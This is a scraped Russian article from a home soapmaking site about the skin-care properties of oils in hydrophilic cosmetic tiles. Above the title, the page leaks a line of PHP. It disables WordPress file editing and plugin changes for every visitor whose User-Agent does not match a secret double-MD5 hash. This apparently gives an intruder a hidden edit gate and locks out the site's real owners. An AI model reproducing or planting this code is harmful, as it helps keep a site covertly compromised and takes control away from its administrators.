if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 7 видео как сделать гидрофильную плитку | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

7 видео как сделать гидрофильную плитку

Мастера натуральной косметики и парфюмерии при изготовлении средств по уходу за кожей лица и тела обращают особое внимание на свойства, которыми обладают входящие в рецептуру составные элементы. В нашем случае, при изготовлении гидрофильных плиток вопрос о полезных веществах был одним из центральных

Масте­ра нату­раль­ной кос­ме­ти­ки и пар­фю­ме­рии при изго­тов­ле­нии средств по ухо­ду за кожей лица и тела обра­ща­ют осо­бое вни­ма­ние на свой­ства, кото­ры­ми обла­да­ют вхо­дя­щие в рецеп­ту­ру состав­ные эле­мен­ты. В нашем слу­чае, при изго­тов­ле­нии гид­ро­филь­ных пли­ток вопрос о полез­ных веще­ствах был одним из центральных.

Так, мас­ло ши смяг­ча­ет, увлаж­ня­ет кожу, защи­ща­ет ее от вред­ных уль­тра­фи­о­ле­то­вых лучей, обла­да­ет реге­не­ри­ру­ю­щи­ми свой­ства­ми. Какао-мас­ло, в свою оче­редь, обра­зу­ет на коже защит­ную плен­ку, обе­ре­га­ю­щую ее от небла­го­при­ят­ных воз­дей­ствий окру­жа­ю­щей сре­ды. Мас­ло пер­си­ко­вых косто­чек обла­да­ет смяг­ча­ю­щи­ми, увлаж­ня­ю­щи­ми и пита­тель­ны­ми свой­ства­ми. Мас­ло заро­ды­шей пше­ни­цы бла­го­твор­но дей­ству­ет на кожу и явля­ет­ся анти­ок­си­дан­том, а эмуль­га­тор пре­вра­ща­ет гид­ро­филь­ную плит­ку при про­ве­де­нии по влаж­ной коже в молоч­ко. Кро­ме того, это сред­ство для ухо­да за кожей мож­но исполь­зо­вать и в каче­стве кре­ма, а не толь­ко после при­ня­тия душа или ванной.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!